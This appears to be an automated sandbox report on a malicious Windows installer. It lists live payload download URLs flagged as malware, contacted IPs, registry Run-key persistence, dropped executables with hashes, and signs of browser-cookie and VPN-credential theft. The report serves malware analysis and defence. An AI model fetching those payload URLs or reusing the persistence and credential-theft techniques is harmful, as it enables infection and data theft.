http://r3.i.lencr.org/05	ieinstal.exe, 00000004.00000003.526285379.0000000000B8E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://r3.o.lencr.org0	ieinstal.exe, 00000004.00000003.526285379.0000000000B8E000.00000004.00000001.sdmp, RegAsm.exe, 00000016.00000002.1048916980.0000000021250000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.sogecoenergy.com/or/ag.bin	RegAsm.exe	true	Avira URL Cloud: malware	unknown
https://api.ipify.org%GETMozilla/5.0	RegAsm.exe, 00000016.00000002.1046908354.000000001DA01000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
https://mariotessarollo.com/or/ag.bin	RegAsm.exe	true	Avira URL Cloud: malware	unknown
http://aMDPVn.com	RegAsm.exe, 00000016.00000002.1046908354.000000001DA01000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://fibertech.ae	RegAsm.exe, 00000016.00000002.1047356210.000000001DD6D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://cps.root-x1.letsencrypt.org0	ieinstal.exe, 00000004.00000002.1037038381.0000000000B7C000.00000004.00000001.sdmp, RegAsm.exe, 00000016.00000002.1048916980.0000000021250000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.yandex.comsocks=http=	ieinstal.exe, 00000004.00000002.1045640426.000000001E54C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
116.203.34.79	sogecoenergy.com	Germany	24940	HETZNER-ASDE	false
185.81.0.109	mariotessarollo.com	Italy	52030	SERVERPLAN-ASIT	false
79.134.225.109	unknown	Switzerland	6775	FINK-TELECOM-SERVICESCH	false
192.185.29.233	fibertech.ae	United States	46606	UNIFIEDLAYER-AS-1US	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	380171
Start date:	01.04.2021
Start time:	17:40:13
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 15m 20s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	ot.msi
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	33
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winMSI@19/5@6/4
EGA Information:	Successful, ratio: 57.1%
HDC Information:	Successful, ratio: 9.3% (good quality ratio 7.5%) Quality average: 52.9% Quality standard deviation: 28.6%
HCA Information:	Successful, ratio: 96% Number of executed functions: 220 Number of non-executed functions: 15
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .msi
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, WMIADAP.exe, MusNotifyIcon.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe, UsoClient.exe Excluded IPs from analysis (whitelisted): 52.147.198.201, 13.88.21.125, 40.88.32.150, 104.42.151.234, 184.30.20.56, 51.11.168.232, 20.49.150.241, 40.127.240.158 Excluded domains from analysis (whitelisted): fs.microsoft.com, e1723.g.akamaiedge.net, settings-win.data.microsoft.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, settingsfd-geo.trafficmanager.net, skypedataprdcoleus16.cloudapp.net, skypedataprdcoleus15.cloudapp.net, blobcollector.events.data.trafficmanager.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net Execution Graph export aborted for target RegAsm.exe, PID 5612 because there are no executed function Execution Graph export aborted for target asparagussens.exe, PID 1180 because there are no executed function Execution Graph export aborted for target asparagussens.exe, PID 484 because there are no executed function Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/380171/sample/ot.msi

Simulations

Behavior and APIs

Time	Type	Description
17:41:41	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run udviklingspsykologisk C:\Users\user\AppData\Local\Temp\Lageradministrationernes5\Hubey7.exe
17:41:45	API Interceptor	229x Sleep call for process: ieinstal.exe modified
17:41:50	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run udviklingspsykologisk C:\Users\user\AppData\Local\Temp\Lageradministrationernes5\Hubey7.exe
17:42:43	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce notabiliteternes C:\Users\user\Afkodedes8\asparagussens.exe
17:42:49	API Interceptor	1857x Sleep call for process: RegAsm.exe modified
17:42:51	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce notabiliteternes C:\Users\user\Afkodedes8\asparagussens.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
116.203.34.79	dd.exe	Get hash	malicious	Browse
185.81.0.109	ota.exe	Get hash	malicious	Browse
185.81.0.109	dd.exe	Get hash	malicious	Browse
79.134.225.109	dd.exe	Get hash	malicious	Browse
	cW49B9lA9c4reHCwa7Be.exe	Get hash	malicious	Browse
	PFA-ZeroLag.sfx.exe	Get hash	malicious	Browse
	igfx.sfx.exe	Get hash	malicious	Browse
	P.O List.exe	Get hash	malicious	Browse
	P.O List.exe	Get hash	malicious	Browse
	22Quotation Ref detail 00821928299.exe	Get hash	malicious	Browse
192.185.29.233	ota.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
mariotessarollo.com	ota.exe	Get hash	malicious	Browse	185.81.0.109
mariotessarollo.com	dd.exe	Get hash	malicious	Browse	185.81.0.109

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
HETZNER-ASDE	dd.exe	Get hash	malicious	Browse	116.203.34.79
	Invoice_23323_1266896570470_xls.xls	Get hash	malicious	Browse	195.201.199.53
	Sales_Receipt 8723_xls.xls	Get hash	malicious	Browse	195.201.199.53
	NR52.vbs	Get hash	malicious	Browse	148.251.248.121
	xXeJaeHDWB.exe	Get hash	malicious	Browse	116.203.98.109
	z3K7aKrxnY.dll	Get hash	malicious	Browse	195.201.199.53
	eQUaXC2xcX.dll	Get hash	malicious	Browse	195.201.199.53
	Xge8NNaMlp.dll	Get hash	malicious	Browse	195.201.199.53
	S7Q7IHtI7P.dll	Get hash	malicious	Browse	195.201.199.53
	Li6CdVD4Fk.dll	Get hash	malicious	Browse	195.201.199.53
	P3oc9jifnU.dll	Get hash	malicious	Browse	195.201.199.53
	lxMd2OQ9QZ.dll	Get hash	malicious	Browse	195.201.199.53
	ajTb3RB2ou.dll	Get hash	malicious	Browse	195.201.199.53
	3LA8Qgt0UO.dll	Get hash	malicious	Browse	195.201.199.53
	X4uDihapth.dll	Get hash	malicious	Browse	195.201.199.53
	HWWKFile.exe	Get hash	malicious	Browse	88.99.66.31
	Sales_Receipt 5576.xls	Get hash	malicious	Browse	195.201.199.53
	Payment_Receipt 1726.xls	Get hash	malicious	Browse	195.201.199.53
	FileZilla_3.53.1_win64_sponsored-setup.exe	Get hash	malicious	Browse	49.12.121.47
	FileZilla_3.53.1_win64_sponsored-setup.exe	Get hash	malicious	Browse	49.12.121.47
SERVERPLAN-ASIT	ota.exe	Get hash	malicious	Browse	185.81.0.109
	dd.exe	Get hash	malicious	Browse	185.81.0.109
	ATBDiek3u4.html	Get hash	malicious	Browse	46.28.2.29
	Copy of Invoice 522967.xlsm	Get hash	malicious	Browse	185.81.4.25
	Copy of Invoice 522967.xlsm	Get hash	malicious	Browse	185.81.4.25
	Copy of Invoice 51682358.xlsm	Get hash	malicious	Browse	185.81.2.128
	Doc.exe	Get hash	malicious	Browse	185.81.4.203
	SecuriteInfo.com.VB.Heur.EmoDldr.32.A9BE9151.Gen.4945.xlsm	Get hash	malicious	Browse	185.81.4.25
	Sign-1870635479_637332644.xls	Get hash	malicious	Browse	185.81.0.78
	SecuriteInfo.com.Exploit.Siggen3.10350.14349.xls	Get hash	malicious	Browse	185.81.0.78
	SecuriteInfo.com.Exploit.Siggen3.10350.13127.xls	Get hash	malicious	Browse	185.81.0.78
	SecuriteInfo.com.Exploit.Siggen3.10350.857.xls	Get hash	malicious	Browse	185.81.0.78
	SecuriteInfo.com.Exploit.Siggen3.10350.12632.xls	Get hash	malicious	Browse	185.81.0.78
	SecuriteInfo.com.Exploit.Siggen3.10350.20211.xls	Get hash	malicious	Browse	185.81.0.78
	SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls	Get hash	malicious	Browse	185.81.0.78
	SecuriteInfo.com.Exploit.Siggen3.10350.24644.xls	Get hash	malicious	Browse	185.81.0.78
	SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls	Get hash	malicious	Browse	185.81.0.78
	SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls	Get hash	malicious	Browse	185.81.0.78
	SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls	Get hash	malicious	Browse	185.81.0.78
	SecuriteInfo.com.Exploit.Siggen3.10350.31033.xls	Get hash	malicious	Browse	185.81.0.78

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	ota.exe	Get hash	malicious	Browse	116.203.34.79 185.81.0.109
	dd.exe	Get hash	malicious	Browse	116.203.34.79 185.81.0.109
	Invoice_23323_1266896570470_xls.xls	Get hash	malicious	Browse	116.203.34.79 185.81.0.109
	brett.moss SWIFT Copy 2021.htm	Get hash	malicious	Browse	116.203.34.79 185.81.0.109
	Tvoz_f.exe	Get hash	malicious	Browse	116.203.34.79 185.81.0.109
	NR52.vbs	Get hash	malicious	Browse	116.203.34.79 185.81.0.109
	AMPUTERE.exe	Get hash	malicious	Browse	116.203.34.79 185.81.0.109
	martin.connor SWIFT Copy 2021.htm	Get hash	malicious	Browse	116.203.34.79 185.81.0.109
	xXeJaeHDWB.exe	Get hash	malicious	Browse	116.203.34.79 185.81.0.109
	Purchase_Order 3109.xls	Get hash	malicious	Browse	116.203.34.79 185.81.0.109
	Invoice_150.xlsm	Get hash	malicious	Browse	116.203.34.79 185.81.0.109
	FileZilla_3.53.1_win64_sponsored-setup.exe	Get hash	malicious	Browse	116.203.34.79 185.81.0.109
	#Ufffd.HTML	Get hash	malicious	Browse	116.203.34.79 185.81.0.109
	FileZilla_3.53.1_win64_sponsored-setup.exe	Get hash	malicious	Browse	116.203.34.79 185.81.0.109
	SecuriteInfo.com.Mal.GandCrypt-A.4160.exe	Get hash	malicious	Browse	116.203.34.79 185.81.0.109
	1Nqs1iTfMz.exe	Get hash	malicious	Browse	116.203.34.79 185.81.0.109
	yPkfbflyoh.exe	Get hash	malicious	Browse	116.203.34.79 185.81.0.109
	SOC_0#7198, INV#512 Via GoogleDocs gracechung.html	Get hash	malicious	Browse	116.203.34.79 185.81.0.109
	lv.exe	Get hash	malicious	Browse	116.203.34.79 185.81.0.109
	8637.xlsx	Get hash	malicious	Browse	116.203.34.79 185.81.0.109

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\Afkodedes8\asparagussens.exe	ota.exe	Get hash	malicious	Browse
C:\Users\user\Afkodedes8\asparagussens.exe	dd.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\ota.exe	ota.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\ota.exe	dd.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\Afkodedes8\asparagussens.exe Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	102400
Entropy (8bit):	5.4602601685745045
Encrypted:	false
SSDEEP:	1536:pQdT+pR4/Mj4EOqc++uyBE/Coq5jcZfP7I4fVRejKtZHyhjgyQfz/pa0AxWAECC8:pgWnc+zyBE/m5jcZH84heEprJa
MD5:	F22F008D6287349195ADEF8975497D1F
SHA1:	64B77588A6835FCBCBF1679F179360D8446DA766
SHA-256:	C6D5DDE1A7608F08848860E1C0EB75EB1C489200494E781476F05BC356A3F1CA
SHA-512:	46CE3DC5976A9DF50185CA0E233ECF4747BC7701E6C12C500280D52750712EF80290E90EFA98FFE56CA94D6EEBD64AB1371DF182E3DB9247411E07ED483CB5C1
Malicious:	true
Joe Sandbox View:	Filename: ota.exe, Detection: malicious, Browse Filename: dd.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L....X.................`...0...............p....@.........................................................................Di..(.......\|...................................................................(... ....................................text...h_.......`.................. ..`.data........p.......p..............@....rsrc...\|...........................@..@..^............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Lageradministrationernes5\Hubey7.exe Download File
Process:	C:\Program Files (x86)\Internet Explorer\ieinstal.exe
File Type:	data
Category:	dropped
Size (bytes):	102401
Entropy (8bit):	5.443600389721494
Encrypted:	false
SSDEEP:	1536:HYNgd2V1trE261H7R/F7ogTI+ri7KJWUv691OGPmahFGo6LcsoWFM1SR5MSY:HbEE2YHd6gU+SrJSY
MD5:	F889D14ADBCC95A93F54D24F4AF140BA
SHA1:	0F031A14CD1ECA0DDEEAD98C09CE1F453B27D0D5
SHA-256:	C991123689604F5A839C971EA532FC0FE0A0723E940DBB4FB6E92B29D699C9AA
SHA-512:	25CEDB4A8CA746129CBA4A10F5865E13CA654176E9F5271C080CE48AECE389B38F18EE901F095B613EE8303D74B6E04D6716930D64462016F6FD217E587D5C6D
Malicious:	false
Preview:	.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L.....pX.................`...0...............p....@.................................N.......................................$g..(.......h...................................................................(... ....................................text...H].......`.................. ..`.data........p.......p..............@....rsrc...h...........................@..@..^............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ota.exe Download File
Process:	C:\Program Files (x86)\Internet Explorer\ieinstal.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	102400
Entropy (8bit):	5.4602601685745045
Encrypted:	false
SSDEEP:	1536:pQdT+pR4/Mj4EOqc++uyBE/Coq5jcZfP7I4fVRejKtZHyhjgyQfz/pa0AxWAECC8:pgWnc+zyBE/m5jcZH84heEprJa
MD5:	F22F008D6287349195ADEF8975497D1F
SHA1:	64B77588A6835FCBCBF1679F179360D8446DA766
SHA-256:	C6D5DDE1A7608F08848860E1C0EB75EB1C489200494E781476F05BC356A3F1CA
SHA-512:	46CE3DC5976A9DF50185CA0E233ECF4747BC7701E6C12C500280D52750712EF80290E90EFA98FFE56CA94D6EEBD64AB1371DF182E3DB9247411E07ED483CB5C1
Malicious:	true
Joe Sandbox View:	Filename: ota.exe, Detection: malicious, Browse Filename: dd.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L....X.................`...0...............p....@.........................................................................Di..(.......\|...................................................................(... ....................................text...h_.......`.................. ..`.data........p.......p..............@....rsrc...\|...........................@..@..^............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\hmoc4uig.ba3\Chrome\Default\Cookies Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	modified
Size (bytes):	20480
Entropy (8bit):	0.6970840431455908
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
MD5:	00681D89EDDB6AD25E6F4BD2E66C61C6
SHA1:	14B2FBFB460816155190377BBC66AB5D2A15F7AB
SHA-256:	8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
SHA-512:	159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	30
Entropy (8bit):	3.964735178725505
Encrypted:	false
SSDEEP:	3:IBVFBWAGRHneyy:ITqAGRHner
MD5:	9F754B47B351EF0FC32527B541420595
SHA1:	006C66220B33E98C725B73495FE97B3291CE14D9
SHA-256:	0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
SHA-512:	C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
Malicious:	false
Preview:	NordVPN directory not found!..

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, MSI Installer, Code page: 1252, Last Printed: Fri Sep 21 10:56:09 2012, Create Time/Date: Fri Sep 21 10:56:09 2012, Name of Creating Application: Windows Installer, Title: Exe to msi converter free, Author: www.exetomsi.com, Template: ;0, Last Saved By: devuser, Revision Number: {C35CF0AA-9B3F-4903-9F05-EBF606D58D3E}, Last Saved Time/Date: Tue May 21 12:56:44 2013, Number of Pages: 100, Number of Words: 0, Security: 0
Entropy (8bit):	4.540848331312282
TrID:	Microsoft Windows Installer (77509/1) 90.64% Generic OLE2 / Multistream Compound File (8008/1) 9.36%
File name:	ot.msi
File size:	147456
MD5:	946a444c46b1e672e4eb35725993e1de
SHA1:	12482793a22afbf1835887d0368ca0dc363f1ae7
SHA256:	40879e36f47835c7af7d4e54d844469e5a1f58fda44027a9005ca61bf33d4a6d
SHA512:	f48cf2d136b990aa8817353876ed284806c1abf8390b86b84bcf19bf351daa44e6a45fca10fb11c996d9d616006d50bb03798a2de810bf796364fa287ee701ef
SSDEEP:	1536:uE3YNgd2V1trE261H7R/F7ogTI+ri7KJWUv691OGPmahFGo6LcsoWFM1SR5MS:uE3bEE2YHd6gU+SrJS
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	a2a0b496b2caca72

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "ot.msi"

Indicators
Has Summary Info:	True
Application Name:	Windows Installer
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	False

Summary
Code Page:	1252
Title:	Exe to msi converter free
Subject:
Author:	www.exetomsi.com
Keywords:
Comments:
Template:	;0
Last Saved By:	devuser
Revion Number:	{C35CF0AA-9B3F-4903-9F05-EBF606D58D3E}
Last Printed:	2012-09-21 09:56:09.490000
Create Time:	2012-09-21 09:56:09.490000
Last Saved Time:	2013-05-21 11:56:44.343000
Number of Pages:	100
Number of Words:	0
Creating Application:	Windows Installer
Security:	0

Streams

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 456

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	456
Entropy:	3.99552685675
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 4 . . . . . . . D . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . P S . . . . @ . . . . P S . . . . . . . . . . . . W i n d o w s I n s t a l l e r . . . . . . . . . . . E x e
Data Raw:	fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 01 00 00 10 00 00 00 01 00 00 00 88 00 00 00 0b 00 00 00 90 00 00 00 0c 00 00 00 9c 00 00 00 12 00 00 00 a8 00 00 00 02 00 00 00 c4 00 00 00 03 00 00 00 e8 00 00 00 04 00 00 00 f4 00 00 00 05 00 00 00 10 01 00 00 06 00 00 00 1c 01 00 00

Stream Path: \x17163\x16689\x18229\x18430\x14797\x14413\x14465\x14351\x14916\x14987\x14977\x14662\x15045\x15173\x14985\x15169\x14784\x14464\x15245\x14670, File Type: PE32 executable (GUI) Intel 80386, for MS Windows, Stream Size: 102400

General
Stream Path:	\x17163\x16689\x18229\x18430\x14797\x14413\x14465\x14351\x14916\x14987\x14977\x14662\x15045\x15173\x14985\x15169\x14784\x14464\x15245\x14670
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Stream Size:	102400
Entropy:	5.44363665931
Base64 Encoded:	True
Data ASCII:	M Z . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . L . ! T h i s p r o g r a m c a n n o t b e r u n i n D O S m o d e . . . . $ . . . . . . . . # . . . B . . . B . . . B . . L ^ . . . B . . . ` . . . B . . . d . . . B . . R i c h . B . . . . . . . . . . P E . . L . . . . . p X . . . . . . . . . . . . . . . . . ` . . . 0 . . . . . . . . . . . . . . . p . . . . @ . . . . . . . . . . . . . . . . .
Data Raw:	4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00

Stream Path: \x18496\x15167\x17394\x17464\x17841, File Type: data, Stream Size: 400

General
Stream Path:	\x18496\x15167\x17394\x17464\x17841
File Type:	data
Stream Size:	400
Entropy:	4.52444917807
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . % . % . % . % . ) . ) . ) . - . - . - . - . - . - . - . - . 4 . 4 . 7 . 7 . 7 . 7 . 7 . 7 . 7 . 7 . < . < . < . s . s . s . s . s . s . y . y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . & . ' . ) . * . + . - . . . / . 0 . 1 . 2 . . . . . 5 .
Data Raw:	05 00 05 00 05 00 13 00 13 00 13 00 1c 00 1c 00 1c 00 1c 00 1c 00 1c 00 25 00 25 00 25 00 25 00 29 00 29 00 29 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 34 00 34 00 37 00 37 00 37 00 37 00 37 00 37 00 37 00 37 00 3c 00 3c 00 3c 00 73 00 73 00 73 00 73 00 73 00 73 00 79 00 79 00 8b 00 8b 00 01 80 02 80 03 80 01 80 02 80 03 80 01 80 02 80 03 80 04 80 05 80 06 80 01 80 02 80

Stream Path: \x18496\x16191\x17783\x17516\x15210\x17892\x18468, File Type: ASCII text, with very long lines, with no line terminators, Stream Size: 1980

General
Stream Path:	\x18496\x16191\x17783\x17516\x15210\x17892\x18468
File Type:	ASCII text, with very long lines, with no line terminators
Stream Size:	1980
Entropy:	5.21964788761
Base64 Encoded:	True
Data ASCII:	N a m e _ D 7 D 1 1 2 F 0 4 9 B A 1 A 6 5 5 B 5 D 9 A 1 D 0 7 0 2 D E E 5 T y p e A d m i n E x e c u t e S e q u e n c e A c t i o n C o n d i t i o n S e q u e n c e C o s t F i n a l i z e C o s t I n i t i a l i z e D I R C A _ T A R G E T D I R T A R G E T D I R = " " F i l e C o s t I n s t a l l A d m i n P a c k a g e I n s t a l l F i l e s I n s t a l l F i n a l i z e I n s t a l l I n i t i a l i z e I n s t a l l V a l i d a t e A d v t E x e c u t e S e q u e n c e C r e a t e S h o r t c u t
Data Raw:	4e 61 6d 65 5f 44 37 44 31 31 32 46 30 34 39 42 41 31 41 36 35 35 42 35 44 39 41 31 44 30 37 30 32 44 45 45 35 54 79 70 65 41 64 6d 69 6e 45 78 65 63 75 74 65 53 65 71 75 65 6e 63 65 41 63 74 69 6f 6e 43 6f 6e 64 69 74 69 6f 6e 53 65 71 75 65 6e 63 65 43 6f 73 74 46 69 6e 61 6c 69 7a 65 43 6f 73 74 49 6e 69 74 69 61 6c 69 7a 65 44 49 52 43 41 5f 54 41 52 47 45 54 44 49 52 54 41 52

Stream Path: \x18496\x16191\x17783\x17516\x15978\x17586\x18479, File Type: data, Stream Size: 576

General
Stream Path:	\x18496\x16191\x17783\x17516\x15978\x17586\x18479
File Type:	data
Stream Size:	576
Entropy:	2.89453686374
Base64 Encoded:	False
Data ASCII:	. . . . . . . . ! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . & . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	00 00 00 00 04 00 01 00 21 00 02 00 00 00 00 00 04 00 01 00 14 00 04 00 06 00 04 00 09 00 04 00 08 00 04 00 0c 00 03 00 0e 00 03 00 0f 00 04 00 0c 00 03 00 08 00 02 00 13 00 01 00 0c 00 02 00 0f 00 03 00 11 00 03 00 0f 00 03 00 13 00 04 00 0f 00 02 00 14 00 02 00 16 00 02 00 11 00 02 00 11 00 02 00 15 00 02 00 10 00 02 00 12 00 02 00 09 00 08 00 0b 00 01 00 0a 00 02 00 0a 00 03 00

Stream Path: \x18496\x16255\x16740\x16943\x18486, File Type: data, Stream Size: 24

General
Stream Path:	\x18496\x16255\x16740\x16943\x18486
File Type:	data
Stream Size:	24
Entropy:	2.79248125036
Base64 Encoded:	False
Data ASCII:	. . . . . . % . ) . - . 4 . 7 . < . s . y . . .
Data Raw:	05 00 13 00 1c 00 25 00 29 00 2d 00 34 00 37 00 3c 00 73 00 79 00 8b 00

Stream Path: \x18496\x16842\x17200\x15281\x16955\x17958\x16951\x16924\x17972\x17512\x16934, File Type: data, Stream Size: 54

General
Stream Path:	\x18496\x16842\x17200\x15281\x16955\x17958\x16951\x16924\x17972\x17512\x16934
File Type:	data
Stream Size:	54
Entropy:	3.32958527672
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . < . . . . . . . x .
Data Raw:	09 00 0a 00 0b 00 0d 00 0e 00 0f 00 10 00 11 00 12 00 00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 83 20 83 ee 82 84 83 3c 8f a0 8f c8 99 dc 85 78 85

Stream Path: \x18496\x16842\x17913\x18126\x16808\x17912\x16168\x17704\x16952\x16817\x18472, File Type: data, Stream Size: 84

General
Stream Path:	\x18496\x16842\x17913\x18126\x16808\x17912\x16168\x17704\x16952\x16817\x18472
File Type:	data
Stream Size:	84
Entropy:	3.65827418243
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . j . r . 8 . . . \\ . $ . . .
Data Raw:	09 00 0a 00 0b 00 10 00 11 00 12 00 14 00 15 00 16 00 17 00 18 00 19 00 1a 00 1b 00 00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 83 20 83 ee 82 c8 99 dc 85 78 85 94 91 6a 98 72 86 38 98 f8 91 5c 92 24 93 c0 92

Stream Path: \x18496\x16911\x17892\x17784\x15144\x17458\x17587\x16945\x17905\x18486, File Type: data, Stream Size: 4

General
Stream Path:	\x18496\x16911\x17892\x17784\x15144\x17458\x17587\x16945\x17905\x18486
File Type:	data
Stream Size:	4
Entropy:	1.5
Base64 Encoded:	False
Data ASCII:	3 . ! .
Data Raw:	33 00 21 00

Stream Path: \x18496\x16911\x17892\x17784\x18472, File Type: data, Stream Size: 16

General
Stream Path:	\x18496\x16911\x17892\x17784\x18472
File Type:	data
Stream Size:	16
Entropy:	1.9197367178
Base64 Encoded:	False
